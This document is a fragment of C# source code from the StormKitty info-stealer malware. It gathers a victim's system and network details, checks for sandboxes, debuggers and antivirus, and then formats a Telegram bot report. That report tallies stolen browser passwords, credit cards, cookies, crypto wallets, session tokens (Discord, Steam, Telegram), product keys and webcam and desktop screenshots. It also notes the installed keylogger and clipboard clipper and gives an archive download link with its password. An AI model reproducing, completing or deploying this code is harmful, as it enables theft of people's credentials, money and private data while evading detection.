public static void Save(string sSavePath)
{
try
{
string SystemInfoText = (""
+ "\n[IP]"
+ "\nExternal IP: " + SystemInfo.GetPublicIP()
+ "\nInternal IP: " + SystemInfo.GetLocalIP()
+ "\nGateway IP: " + SystemInfo.GetDefaultGateway()
+ "\n"
+ "\n[Machine]"
+ "\nUsername: "******"\nCompname: " + SystemInfo.compname
+ "\nSystem: " + SystemInfo.GetSystemVersion()
+ "\nCPU: " + SystemInfo.GetCPUName()
+ "\nGPU: " + SystemInfo.GetGPUName()
+ "\nRAM: " + SystemInfo.GetRamAmount()
+ "\nDATE: " + SystemInfo.datenow
+ "\nSCREEN: " + SystemInfo.ScreenMetrics()
+ "\nBATTERY: " + SystemInfo.GetBattery()
+ "\nWEBCAMS COUNT: " + WebcamScreenshot.GetConnectedCamerasCount()
+ "\n"
+ "\n[Virtualization]"
+ "\nVirtualMachine: " + AntiAnalysis.VirtualBox()
+ "\nSandBoxie: " + AntiAnalysis.SandBox()
+ "\nEmulator: " + AntiAnalysis.Emulator()
+ "\nDebugger: " + AntiAnalysis.Debugger()
+ "\nProcesse: " + AntiAnalysis.Processes()
+ "\nHosting: " + AntiAnalysis.Hosting()
+ "\nAntivirus: " + SystemInfo.GetAntivirus()
+ "\n");
System.IO.File.WriteAllText(sSavePath, SystemInfoText);
} catch (System.Exception ex) { Logging.Log("SysInfo >> Failed fetch system info\n" + ex); }
}
/// <summary>
/// Format system information for sending to telegram bot
/// </summary>
/// <returns>String with formatted system information</returns>
private static void SendSystemInfo(string url)
{
UploadKeylogs();
// Get info
string info = (""
+ "\n 😹 *StormKitty - Report:*"
+ "\nDate: " + SystemInfo.datenow
+ "\nSystem: " + SystemInfo.GetSystemVersion()
+ "\nUsername: "******"\nCompName: " + SystemInfo.compname
+ "\nLanguage: " + Flags.GetFlag(SystemInfo.culture.Split('-')[1]) + " " + SystemInfo.culture
+ "\nAntivirus: " + SystemInfo.GetAntivirus()
+ "\n"
+ "\n 💻 *Hardware:*"
+ "\nCPU: " + SystemInfo.GetCPUName()
+ "\nGPU: " + SystemInfo.GetGPUName()
+ "\nRAM: " + SystemInfo.GetRamAmount()
+ "\nPower: " + SystemInfo.GetBattery()
+ "\nScreen: " + SystemInfo.ScreenMetrics()
+ "\nWebcams count: " + WebcamScreenshot.GetConnectedCamerasCount()
+ "\n"
+ "\n 📡 *Network:* "
+ "\nGateway IP: " + SystemInfo.GetDefaultGateway()
+ "\nInternal IP: " + SystemInfo.GetLocalIP()
+ "\nExternal IP: " + SystemInfo.GetPublicIP()
+ "\n" + SystemInfo.GetLocation()
+ "\n"
+ "\n 💸 *Domains info:*"
+ Counter.GetLValue("🏦 *Banking services*", Counter.DetectedBankingServices, '-')
+ Counter.GetLValue("💰 *Cryptocurrency services*", Counter.DetectedCryptoServices, '-')
+ Counter.GetLValue("🎨 *Social networks*", Counter.DetectedSocialServices, '-')
+ Counter.GetLValue("🍓 *P**n websites*", Counter.DetectedPornServices, '-')
+ GetKeylogsHistory()
+ "\n"
+ "\n 🌐 *Browsers:*"
+ Counter.GetIValue("🔑 Passwords", Counter.Passwords)
+ Counter.GetIValue("💳 CreditCards", Counter.CreditCards)
+ Counter.GetIValue("🍪 Cookies", Counter.Cookies)
+ Counter.GetIValue("📂 AutoFill", Counter.AutoFill)
+ Counter.GetIValue("⏳ History", Counter.History)
+ Counter.GetIValue("🔖 Bookmarks", Counter.Bookmarks)
+ Counter.GetIValue("📦 Downloads", Counter.Downloads)
+ "\n"
+ "\n 🗃 *Software:*"
+ Counter.GetIValue("💰 Wallets", Counter.Wallets)
+ Counter.GetIValue("📡 FTP hosts", Counter.FTPHosts)
+ Counter.GetIValue("🔌 VPN accounts", Counter.VPN)
+ Counter.GetIValue("🦢 Pidgin accounts", Counter.Pidgin)
+ Counter.GetSValue("📫 Outlook accounts", Counter.Outlook)
+ Counter.GetSValue("✈️ Telegram sessions", Counter.Telegram)
+ Counter.GetSValue("☁️ Skype session", Counter.Skype)
+ Counter.GetSValue("💬 Discord token", Counter.Discord)
+ Counter.GetSValue("🎮 Steam session", Counter.Steam)
+ Counter.GetSValue("🎮 Uplay session", Counter.Uplay)
+ Counter.GetSValue("🎮 BattleNET session", Counter.BattleNET)
+ "\n"
+ "\n 🧭 *Device:*"
+ Counter.GetSValue("🗝 Windows product key", Counter.ProductKey)
+ Counter.GetIValue("🛰 Wifi networks", Counter.SavedWifiNetworks)
+ Counter.GetSValue("📸 Webcam screenshot", Counter.WebcamScreenshot)
+ Counter.GetSValue("🌃 Desktop screenshot", Counter.DesktopScreenshot)
+ "\n"
+ "\n 🦠 *Installation:*"
+ Counter.GetBValue(Config.Autorun == "1" && (Counter.BankingServices || Counter.CryptoServices),
"✅ Startup installed", "⛔️ Startup disabled")
+ Counter.GetBValue(Config.ClipperModule == "1" && Counter.CryptoServices && Config.Autorun == "1",
"✅ Clipper installed", "⛔️ Clipper not installed")
+ Counter.GetBValue(Config.KeyloggerModule == "1" && Counter.BankingServices && Config.Autorun == "1",
"✅ Keylogger installed", "⛔️ Keylogger not installed")
+ "\n"
+ "\n 📄 *File Grabber:*" + ((Config.GrabberModule != "1") ? "\n ∟ ⛔️ Disabled in configuration" : "")
+ Counter.GetIValue("📂 Images", Counter.GrabberImages)
+ Counter.GetIValue("📂 Documents", Counter.GrabberDocuments)
+ Counter.GetIValue("📂 Database files", Counter.GrabberDatabases)
+ Counter.GetIValue("📂 Source code files", Counter.GrabberSourceCodes)
+ "\n"
+ $"\n🔗 [Archive download link]({url})"
+ "\n🔐 *Archive password is*: \"_" + Implant.StringsCrypt.ArchivePassword + "\"_"
);
int last = GetLatestMessageId();
if (last != -1)
{
EditMessage(info, last);
}
else
{
SetLatestMessageId(SendMessage(info));
}
}